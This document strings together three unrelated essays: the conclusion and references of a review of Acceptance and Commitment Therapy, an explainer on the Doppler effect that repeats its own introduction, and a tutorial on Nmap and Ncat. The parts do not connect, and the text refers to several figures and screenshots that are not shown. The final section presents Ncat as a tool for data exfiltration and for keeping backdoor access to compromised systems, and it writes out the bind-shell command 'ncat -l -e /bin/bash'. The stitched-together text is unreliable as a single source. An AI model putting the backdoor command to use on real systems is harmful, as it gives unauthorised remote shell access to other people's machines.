Acceptance and Commitment Therapy (ACT) is a newer psychotherapy that has generated considerable clinical and research interest and has increased in popularity in recent years. After reviewing research on this behaviourally based and broadly applicable model, it can be concluded that ACT is successful in treating a wide variety of psychological problems, such as depression, anxiety, and other psychopathology, as well as physical health concerns. Additionally, although ACT was originally developed within clinical psychology, it has demonstrated potential in aiding individuals’ health behaviour change. A dominant finding in the reviewed articles was that interventions based on ACT produce significant improvements in levels of depression and psychological flexibility across differing populations. The core principles and processes of ACT have also been found applicable to individuals who do not have psychological or physical impairments themselves but who care for individuals with a range of issues, such as physical concerns and intellectual disabilities; ACT has been found to mitigate psychological distress and reduce levels of depression in these caregivers. Furthermore, an abundance of research has demonstrated that ACT is a feasible and effective treatment option in many populations, even when compared to other empirically supported and established therapies such as cognitive-behavioural therapy (CBT). It was acknowledged that the evidence does not support using ACT above CBT; however, both treatments were found equally effective in treating anxiety in children.

The articles reviewed did not provide any contradictory research results.

The results of the review suggest that the ACT model can have a positive impact and produce significant improvements in individuals when applied by trained professionals. This has long-term implications for client satisfaction and precision in client-therapist communication. It should also be acknowledged that the review found clinical expertise to be associated with improved ACT outcomes. Furthermore, the research indicated that, because of ACT’s focus on acceptance, self, and emotions, the model is attractive to many nonbehavioural and skilled clinicians, suggesting that ACT’s limited number of concepts can still have broad clinical appeal (Strosahl, Hayes, Bergan, & Romano, 1998). Some of the outcomes identified went beyond changes in symptoms to outcomes of major systems importance, such as the interest from government and care organisations in the brief treatment period, which has an evident impact on cost effectiveness in health care delivery systems. A further caveat is that the sample sizes of previous studies have been small and the populations diverse, so conclusions need to be drawn with caution. In one particular study the participants resided in the same school area, which limited the generalizability of the results. Most of the studies, which seem to support many critical aspects of ACT, are smaller pilot studies with methodological limitations.

Although research involving randomized clinical trials and controlled time series investigating ACT is growing, some issues need to be addressed for ACT to continue to advance and to clarify the efficacy of its research (Strosahl et al., 1998). Most studies of ACT thus far have been conducted with adults, so evidence of its effectiveness with adolescents and children is limited. It would be valuable for ACT to be applied in more diverse populations in order to investigate its promising trans-diagnostic and robust effects. Furthermore, increased efforts are required to replicate previous findings using independent and larger samples; this is important when examining the robustness of the preliminary effects previously reported. Additional controlled experimental studies examining processes crucial to ACT, such as self and values, would supplement and further support the results from larger efficacy trials (Gaudiano, 2011). It has been proposed that traditional symptom measures may fail to identify hypothesised ACT-specific change processes and thereby contribute to null results. Future research into developing more reliable and valid measures of ACT processes and outcomes is recommended; additionally, including more objective, behavioural task-based measures would complement self-report measures.

The articles reviewed demonstrated that ACT interventions were successful in treating individuals with physical health concerns and autism spectrum disorder (ASD), as well as those who aid in their care. It has been proposed that 33% of adults with an ASD diagnosis also have a physical disability; however, there is limited research on ACT for comorbid physical health concerns and ASD (Rydzewska et al., 2018). Given this high comorbidity, future research into effective interventions for this population would be of benefit.

References

Bethay, S., Wilson, KG., Schnetzer, L., & Nassar, S. (2013). A controlled pilot evaluation of Acceptance and Commitment Training for intellectual disability staff. Mindfulness, 4(2), 113-121. doi: 10.1007/s12671-012-0103-8

Blackledge, J., & Hayes, S. (2006). Using Acceptance and Commitment Training in the Support of Parents of Children diagnosed with Autism. Child and Family Behavior Therapy, 28(1), 1-18. doi: 10.1300/J019v28n01_01

Breslau, N., & Davis, GC. (1986). Chronic stress and major depression. Archives of General Psychiatry, 43(4), 309-314. doi: 10.1001/archpsyc.1986.01800040015003

Calear, AL., & Christensen, H. (2010). Systematic review of school-based prevention and early intervention programs for depression. Journal of Adolescence, 33(3), 429-438. doi: 10.1016/j.adolescence.2009.07.004

Gaudiano, BA. (2009). Ost’s (2008) methodological comparison of clinical trials of acceptance and commitment therapy versus cognitive behavior therapy: Matching apples with oranges? Behaviour Research and Therapy, 47(12), 1066-1070. doi: 10.1016/j.brat.2009.07.020

Gaudiano, B. (2011). A review of Acceptance and Commitment Therapy (ACT) and recommendations for continued scientific advancement. The Scientific Review of Mental Health Practice, 8(2), 2-22.

Halliburton, A., & Cooper, L. (2015). Applications and adaptations of Acceptance and Commitment therapy (ACT) for adolescents. Journal of Contextual Behavioral Science, 4(1), 1-11. doi: 10.1016/j.jcbs.2015.01.002

Leoni, M., Corti, S., Cavagnola, R., Healy, O., & Noone, S. (2016). How Acceptance and Commitment Therapy changed the perspective on support provision for staff working with intellectual disability. Advances in Mental Health and Intellectual Disabilities, 10(1), 59-73. doi: 10.1108/AMHID-09-2015-0046

Livheim, F., Hayes, L., Ghaderi, A., Magnusdottir, T., Hogfeldt, A., Rowse, J., … Tengstrom, A. (2015). The effectiveness of Acceptance and Commitment Therapy for adolescent mental health: Swedish and Australian pilot outcomes. Journal of Child and Family Studies, 24(4), 1016-1030. doi: 10.1007/s10826-014-9912-9

Luborsky, L., Singer, B., & Luborsky, L. (1975). Comparative studies of psychotherapies. Is it true that “everyone has won and all must have prizes”? Archives of General Psychiatry, 32(8), 995-1008. doi: 10.1001/archpsyc.1975.01760260059004

Murrell, A., & Scherbarth, A. (2011). State of the research & literature address: ACT with children, adolescents and parents. The International Journal of Behavioral Consultation and Therapy, 7(1), 15-22. doi: 10.1037/h0101005

Ong, C., Lee, E., & Twohig, M. (2018). A meta-analysis of dropout rates in acceptance and commitment therapy. Behaviour Research and Therapy, 104, 14-33. doi: 10.1016/j.brat.2018.02.004

Pahnke, J., Lundgren, T., Hursti, T., & Hirvikoski, T. (2014). Outcomes of an Acceptance and Commitment Therapy-based skills training group for students with high-functioning autism spectrum disorder: A quasi-experimental pilot study. Autism, 18(8), 953-964. doi: 10.1177/1362361313501091

Rydzewska, E., Hughes-McCormack, LA., Gillberg, C., Henderson, A., MacIntyre, C., Rintoul, J., & Cooper, SA. (2018). Prevalence of long-term health conditions in adults with autism: Observational study of a whole country population. BMJ Open, 8(8), 1-11. doi: 10.1136/bmjopen-2018-023945

Strosahl, K., Hayes, S., Bergan, J., & Romano, P. (1998). Assessing the field effectiveness of Acceptance and Commitment Therapy: An example of the manipulated training research method. Behavior Therapy, 29(1), 35-64. doi: 10.1016/S0005-7894(98)80017-8

Swain, J., Hancock, K., Dixon, A., Koo, S., & Bowan, J. (2013). Acceptance and Commitment Therapy for anxious children and adolescents: Study protocol for a randomised controlled trial. Trials, 14(140), 1-12. doi: 10.1186/1745-6215-14-140

Swain, J., Hancock, K., Dixon, A., & Bowman, J. (2015). Acceptance and Commitment Therapy for children: A systematic review of intervention studies. Journal of Contextual Behavioral Science, 4(2), 73-85. doi: 10.1016/j.jcbs.2015.02.001

Swain, J., Hancock, K., Hainsworth, C., & Bowman, J. (2013). Acceptance and Commitment Therapy in the treatment of anxiety: A systematic review. Clinical Psychology Review, 33(8), 965-978. doi: 10.1016/j.cpr.2013.07.002

Villatte, JL., Vilardaga, R., Villatte, M., Vilardaga, JC., Atkins, DC., & Hayes, SC. (2016). Acceptance and Commitment Therapy modules: Differential impact on treatment processes and outcomes. Behaviour Research and Therapy, 77, 52-61. doi: 10.1016/j.brat.2015.12.001

Wicksell, R., Kanstrup, M., Kemani, M., Holmstrom, L., & Olsson, G. (2015). Acceptance and Commitment Therapy for children and adolescents with physical health concerns. Current Opinion in Psychology, 2, 1-5. doi: 10.1016/j.copsyc.2014.12.029

## The Doppler Effect And Its Applications

Perhaps you have noticed how the sound of a vehicle’s horn changes as the vehicle moves past you. The frequency of the sound you hear as the vehicle approaches is higher than the frequency you hear as it moves away from you. This is one example of the Doppler Effect. To see what causes this apparent frequency change, imagine you are in a boat lying at anchor on a gentle sea where the waves have a period of T = 3.0 s. This means that every 3.0 s a crest hits your boat. If you now start the motor and head directly into the waves, the crests strike the boat more often than every 3.0 s; if you instead travel in the same direction as the waves, they strike less often. These effects occur because the relative speed between your boat and the waves depends on the direction of travel and on the speed of your boat. When you are moving toward the right in Figure 17.9b, this relative speed is higher than the wave speed, which leads to the observation of an increased frequency. When you turn around and move to the left, the relative speed is lower, as is the observed frequency of the water waves.
Doppler Effect (Sound) and its Application
Introduction
In physics, the Doppler Effect can be defined as the apparent increase or decrease in the frequency of sound (and of other waves) as the source and the observer move toward or away from each other. The effect causes the change in pitch that is clearly noticed in a passing siren or train horn, as well as the red shift/blue shift of light.


The Doppler Effect is familiar from everyday experience. It explains the change in pitch of a fast-moving car horn, or any other fast-moving sound source, as it passes us. If the car is approaching us, the pitch of its horn will be higher than if the car were stationary, and as the car passes us and begins to move away, the pitch will be lower than if the car were stationary. In fact, whenever the source and the observer of a sound are in relative motion, the observed frequency will differ from the frequency emitted by the source.
For example:
The observer hears a higher frequency when the train is approaching.
The observer hears a lower frequency when the train is moving away.
History:
The Doppler Effect was discovered by the scientist Christian Doppler, who presented his idea in 1842. He reasoned that sound waves coming from a source moving toward the observer would have a higher frequency, while those from a source moving away from the observer would have a lower frequency. Though some doubted the existence of this phenomenon, it was experimentally verified in 1845 by C. H. D. Buys Ballot (1817-1890) of Holland. Buys Ballot examined the alteration in pitch as he was passed by a locomotive carrying several trumpeters, all playing a constant note. The Doppler Effect is considered most often in relation to sound (acoustic waves) and light (electromagnetic waves), but it holds for any wave. When the source and observer of light waves move apart, the observed light is shifted to lower frequencies, towards the “red” end of the spectrum, while if the source and observer move toward each other, the light is shifted to higher frequencies, towards the “blue” end of the spectrum.
The Doppler Effect, then, is the change in the frequency observed when a wave is emitted by a source moving with respect to the observer: there is an apparent upward shift in the observed frequency when the source and the observer approach each other, and a downward shift when they recede from each other.
Change in the wavelength due to the motion of the source
For waves that propagate in a medium, such as sound waves, the speeds of the observer and the source are measured relative to the medium in which the waves are transmitted. The Doppler Effect may therefore result from motion of the source, motion of the observer, or both, and each effect is analysed separately. For waves that do not require a medium for propagation, e.g. light, and gravity in general relativity, only the difference in velocity between the observer and the source needs to be considered.
TYPES OF DOPPLER EFFECT:
Symmetrical: – The Doppler shift is the same whether the source of light moves towards/away from a stationary observer or the observer moves with the same velocity towards/away from the stationary source.
Asymmetrical: – The apparent change in frequency is different when the source of sound moves towards/away from a stationary observer than when the observer moves with the same velocity towards/away from the stationary source.
DOPPLER FORMULAE:
Let f be the frequency emitted by the source, f′ the frequency measured by the observer, v the speed of sound in the medium, v_o the observer’s speed, and v_s the source’s speed.

If the observer is in motion and the source is stationary, the measured frequency is

f′ = f (v ± v_o) / v,   (1)

where the upper sign corresponds to an approaching observer and the lower sign to a receding observer.

If the source is in motion and the observer is stationary, the measured frequency is

f′ = f v / (v ∓ v_s),   (2)

where the upper sign corresponds to the source approaching and the lower sign to the source receding from the observer.

When both the source and the observer are in motion, the measured frequency is

f′ = f (v ± v_o) / (v ∓ v_s).   (3)

Note that the signs in the numerator and the denominator are independent of each other. In the numerator, the upper sign is used if the observer is moving toward the source and the lower sign if moving away; in the denominator, the upper sign is used if the source is moving toward the observer and the lower sign if moving away.

A simple trick for remembering the signs is to ask whether the observed frequency ought to increase or decrease, and to choose whichever signs produce that result. For example, when an observer is moving away from a source, the wave crests pass it at a slower rate than if it were still, which means the observed frequency decreases.

Likewise, when a source is moving toward an observer, it “smooshes” the waves together as it emits them, which increases the observed frequency. This is captured by making the denominator in Eq. (3) smaller, which again requires the upper sign.
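As a quick numerical check of these sign conventions, the general relation can be put into a short function. This is a minimal sketch (the function name and sign convention below are my own): a positive v_observer means the observer moves toward the source, and a positive v_src means the source moves toward the observer.

```python
def doppler_frequency(f_emitted, v_sound, v_observer=0.0, v_src=0.0):
    """Observed frequency for sound, f' = f (v + v_o) / (v - v_s).

    Sign convention: v_observer > 0 means the observer moves toward the
    source; v_src > 0 means the source moves toward the observer.
    Motion away from the other party is expressed with negative values.
    """
    return f_emitted * (v_sound + v_observer) / (v_sound - v_src)

# An observer approaching a stationary 1000 Hz source at 34 m/s
# (with v = 340 m/s) hears 1000 * (340 + 34) / 340 = 1100 Hz.
print(doppler_frequency(1000.0, 340.0, v_observer=34.0))
```

With both speeds zero the function returns the emitted frequency unchanged, and a receding observer (negative v_observer) lowers it, as the sign discussion requires.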
Source moving with v_s < v: The source radiates sound waves at a constant frequency into the medium while moving to the right with a speed v_s = 0.7v (Mach 0.7). The wave fronts are produced at the same rate, but since the source is moving, the centre of each new wave front is shifted slightly to the right. As a result, the wave fronts bunch up on the right side (in front of the source) and spread further apart on the left side (behind it). An observer in front of the source hears a higher frequency f′ > f0, while an observer behind the source hears a lower frequency f′ < f0.
Source moving with v_s = v: Here the source is moving at the speed of sound in the medium (Mach 1). The wave fronts in front of the source all bunch up at the same point, so an observer in front of the source detects nothing until the source arrives. The front is then quite intense, because all the wave fronts add together. The figure at right shows a bullet travelling at Mach 1.01; you can see the shock-wave front just ahead of the bullet.
Source moving with v_s > v:
The sound source has broken through the sound-speed barrier and is travelling faster than the speed of sound. Since the source is moving faster than the sound waves it creates, it actually leads the advancing wave fronts. It is the intense pressure front on the Mach cone that causes the shock wave known as a sonic boom when a supersonic aircraft passes overhead. The shock wave advances at the speed of sound v, and since it is built up from all of the combined wave fronts, the sound heard by the observer is quite intense.
Application of Doppler Effect:
Sirens: – “The reason the siren slides is because it doesn’t hit you.”
That is, if the siren approached the observer directly, the pitch would remain constant (the radial component v_{s,r} would be constant) until the source reached the observer, and would then jump to a lower pitch. Because the vehicle instead passes by the observer, the radial velocity does not remain constant, but varies as a function of the angle between the observer’s line of sight and the siren’s velocity:
v_r = v_s cos θ
where v_s is the velocity of the source with respect to the medium, and θ is the angle between the object’s forward velocity and the line of sight from the object to the observer.
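This angular dependence is easy to tabulate. The sketch below (function name my own, stationary observer assumed) plugs the radial component v_r = v_s cos θ into the moving-source Doppler relation:

```python
import math

def observed_siren_frequency(f_siren, v_sound, v_vehicle, theta):
    """Frequency heard by a stationary observer when only the radial
    component v_r = v_vehicle * cos(theta) of the vehicle's velocity
    contributes to the Doppler shift."""
    v_r = v_vehicle * math.cos(theta)
    return f_siren * v_sound / (v_sound - v_r)

# A 700 Hz siren on a vehicle moving at 30 m/s (v = 340 m/s):
# head-on (theta = 0) the pitch is raised; broadside (theta = 90 deg)
# the radial component vanishes and the pitch is momentarily unshifted.
for theta_deg in (0, 45, 90, 135, 180):
    f = observed_siren_frequency(700.0, 340.0, 30.0, math.radians(theta_deg))
    print(theta_deg, round(f, 1))
```

As the vehicle passes, θ sweeps from 0° towards 180°, so the pitch slides smoothly from raised to lowered rather than jumping.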
Radar: – The Doppler Effect is widely used in radar to measure the velocity of a target. A radio wave of known wavelength and intensity is fired at a moving target. If the target is receding from the radar source, each subsequent wave must travel farther to reach the target before being reflected and re-detected near the source; the gap between successive waves therefore increases, increasing the wavelength (for an approaching target the reverse occurs). Calculations based on the measured Doppler shift accurately determine the target’s velocity.
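For a target moving much more slowly than the wave, the two-way (transmit-and-reflect) Doppler shift is approximately Δf = 2·v·f/c, so the target’s speed can be recovered from the measured shift. A minimal sketch (the function name and the example numbers are illustrative):

```python
def radar_target_speed(f_transmit, f_shift, wave_speed):
    """Radial speed of a target from the two-way Doppler shift,
    using the low-speed approximation delta_f = 2 * v * f / c."""
    return f_shift * wave_speed / (2.0 * f_transmit)

# A 10 GHz radar measuring a 2 kHz shift on the reflected radio wave
# (c = 3e8 m/s) implies a closing speed of 2000 * 3e8 / 2e10 = 30 m/s.
print(radar_target_speed(10e9, 2000.0, 3e8))
```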
Weather Analysis or prediction: -Doppler radar uses the Doppler Effect for electromagnetic waves to predict the weather.
In Astronomy:-The Doppler shift for light is used to help astronomers discover new planets and binary stars.
Echocardiography: – A medical test uses ultrasound and Doppler techniques to visualize the structure of the heart.

## NMAP Scan: Features and Applications


Introduction:

Before we start with the technical intricacies of mastering Nmap, it is a good idea to know how Nmap itself began and evolved as a project. This tool has been around for nearly twenty years, and is a well-loved and often-used tool across many technical industries.

Nmap started from humble beginnings. Unlike the commercial security tools that are released today, the very first Nmap was only about 2,000 lines of code, released in 1997 in issue 51 of Phrack, a hacker “zine” that was started in 1985. Nmap’s timeline is a fascinating one, and its growth has been extraordinary.

Features of Nmap:

Port scanning is clearly vital for security professionals — after all, without knowing what network ports are open, it would be impossible to assess the security of a system — but Nmap is also very valuable for other types of information technology professionals.

System administrators use Nmap to determine which of their systems are online, so they can spot problems or inconsistencies on their network. Likewise, using OS detection and service detection, these administrators can easily verify that all systems are running the same (hopefully current) versions of operating systems and network-enabled software.

Because of its ability to alter timing, as well as set specific flags on different packets (for example, the Xmas Tree scan), developers can turn to Nmap for help in testing embedded network stacks, in order to verify that aggressive network traffic will not have unintended outcomes that crash a system.

Lastly, and perhaps most importantly, students of network and computer engineering are major users of Nmap. Because it is free and open source software, there is no barrier to getting the software and running it right away. Even amateur users scanning their own small home networks can learn an enormous amount about how their computers and networks work and are designed by seeing what services are online. Although there are Windows and OS X ports, Nmap is also a good introduction to running simple (but powerful) tools on the Linux command line.

Techniques used by Nmap:

In December 2006, one of the most important aspects of the Nmap project was integrated into all Nmap builds: the Nmap Scripting Engine (NSE). The NSE allows users of Nmap to write their own modules (in a scripting language called Lua) that trigger on certain ports being open, or certain services — or even specific versions of services — found listening. This release elevated Nmap from a simple networking tool to a fully robust and customizable vulnerability assessment engine, suitable for a wide variety of tasks.

In addition to creating a robust scanning tool and the NSE, the Nmap developers have included several further tools — including Ncrack, Nping, Ncat, and Ndiff — in default install bundles of Nmap. These tools can help analyze existing scans, pivot to other hosts, transfer files, or compare scan results over time.

In this chapter, we will cover the following topics:

Attacking services with Ncrack

Host detection with Nping

File transfers and backdoors with Ncat

Comparing Nmap results with Ndiff

Experimental setup and usage of Nmap:

File transfers and backdoors with Ncat

For those who may not be familiar, a wonderful network administration tool called Netcat was unveiled in 1995. It had a range of uses, from file transfers, to network monitoring, to chat servers — it was even useful for creating a backdoor by mirroring its input to a given network address of the user’s choice. Netcat was in many ways a very lightweight port scanner: with a quick shell script, it was extremely straightforward to test whether certain ports were responding on a given host.

Netcat remains in heavy use today, but the Nmap development team saw some pretty serious improvements, both in stability and usability, that they could make to the software. As such, in 2009, Ncat was released as a component of the Nmap suite.

Unlike Netcat, Ncat has native SSL support, great connection redirection reliability, and several other built-in options that make it a fine tool in a security administrator’s toolkit.

Ncat has two modes: the “listen” mode, which listens on a provided port for incoming connections, and the “connect” mode, through which commands are sent and feedback is received. In connect mode, we can use Ncat to connect to a variety of services, including HTTP-based web servers.

Sending the GET / HTTP/1.0 request after invoking Ncat via ncat nmap.org 80 yields the following output:
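What Ncat’s connect mode does here can be sketched with plain sockets. The snippet below is illustrative only: rather than contacting a live site, it stands up a throwaway local server (the canned response and all names are made up) and then sends the same GET / HTTP/1.0 request by hand:

```python
import socket
import threading

CANNED = b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n<html>hello</html>"

def tiny_http_server(server_sock):
    """Accept one connection, read the request, reply with a canned response."""
    conn, _ = server_sock.accept()
    conn.recv(4096)  # read the GET request; contents ignored by this toy server
    conn.sendall(CANNED)
    conn.close()

def http_get_raw(host, port):
    """Open a TCP connection, send a raw HTTP request, read the raw reply --
    the same steps as typing `GET / HTTP/1.0` into `ncat <host> <port>`."""
    with socket.create_connection((host, port)) as s:
        s.sendall(b"GET / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:  # server closed the connection
                break
            chunks.append(data)
    return b"".join(chunks)

srv = socket.socket()
srv.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
srv.listen(1)
port = srv.getsockname()[1]
t = threading.Thread(target=tiny_http_server, args=(srv,))
t.start()
reply = http_get_raw("127.0.0.1", port)
t.join()
srv.close()
print(reply.decode())
```

Against a real web server, the reply would of course be the site’s own headers and HTML rather than the canned bytes above.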

Although it clearly does not render as well as a web browser like Chrome or Firefox would, you can see the HTTP/HTML response from the web server quite clearly.

This same functionality of Ncat can be used to connect to many other types of services, including SMTP, FTP, POP3, and so on. When attempting to send different inputs to different protocols, Ncat can be invaluable!

Ncat is also very helpful when conducting a penetration test or security assessment, as it can be used both as a means of data exfiltration and as a way to maintain a persistent backdoor into a compromised system.

The ability to send a file through Ncat uses both the “listen” and “connect” functionalities of the tool. The following screenshot shows a very basic Ncat command:

To begin, we set up an Ncat listener using the -l or listen flag. Since we are expecting a file, we pipe the output to received.txt. We always want to make sure that we output the type of file we are expecting, so we do not have to handle changing file types at a later date. When setting up the listener, we could also have set a specific port (which is helpful on penetration tests); in this case, however, we left the default port of 31337 intact.

We can see in the preceding screenshot that somewhere else (not on the listener) we have a file called send.txt containing the content we are going to send. Sending the file is easy! All we need to do is invoke Ncat, point it at localhost (again, we are using the default port of 31337, so no port specification is necessary), and pipe in the input from send.txt. The following screenshot demonstrates opening a received text file:
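The listener/sender pair just described can be approximated with plain Python sockets, which makes the mechanics explicit. This is a hedged sketch of the idea, not Ncat itself; the payload and function names are illustrative:

```python
import socket
import threading

def ncat_style_listen(server_sock, results):
    """Roughly `ncat -l <port> > received.txt`: accept one connection and
    collect everything sent until the peer closes the connection."""
    conn, _ = server_sock.accept()
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:  # sender closed the connection: end of file
            break
        chunks.append(data)
    conn.close()
    results.append(b"".join(chunks))

def ncat_style_send(host, port, payload):
    """Roughly `ncat <host> <port> < send.txt`: connect, write, close."""
    with socket.create_connection((host, port)) as s:
        s.sendall(payload)

srv = socket.socket()
srv.bind(("127.0.0.1", 0))  # port 0 = any free port (31337 in the text)
srv.listen(1)
port = srv.getsockname()[1]
received = []
t = threading.Thread(target=ncat_style_listen, args=(srv, received))
t.start()
ncat_style_send("127.0.0.1", port, b"contents of send.txt\n")
t.join()
srv.close()
print(received[0])
```

Closing the sending socket is what signals end-of-file to the listener, which is exactly why Ncat exits automatically once the file is received.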

As we can see in the preceding screenshot, Ncat automatically closes once the file is received. Once we actually receive the file, it is as simple as “cat”-ing the file to confirm that it has in fact the same content as the one we sent. Lastly, Ncat can be used as a backdoor, in order to maintain persistent access to a compromised system. The following screenshot shows this basic functionality:

As seen in the preceding screenshot, establishing a shell connection via Ncat is very straightforward. We used ncat -l -e /bin/bash to listen on the default port and execute /bin/bash (our shell) once a client connected. It is worth noting that in this form the backdoor is not persistent, meaning that it will not keep listening after the client has disconnected. The following screenshot demonstrates the ability to run Linux commands on a remote system through Ncat:

In order to connect to the shell, as shown in the preceding screenshot, we can simply invoke ncat localhost (since the port remains the default) and have a bash shell spawned at our prompt. In this case, we ran whoami and received back dshaw, then executed an ls command and received a directory listing of the remote directory. While other backdoor access methods may be more reliable or sophisticated, it is hard to think of one more simple!

Conclusion:

Nmap is a very powerful tool, covering the very first aspects of penetration testing, which include reconnaissance and enumeration. This article was written in an attempt to discuss Nmap from the beginner level to the advanced level. There are so many other things that you can do with Nmap, and we will discuss them in future articles.
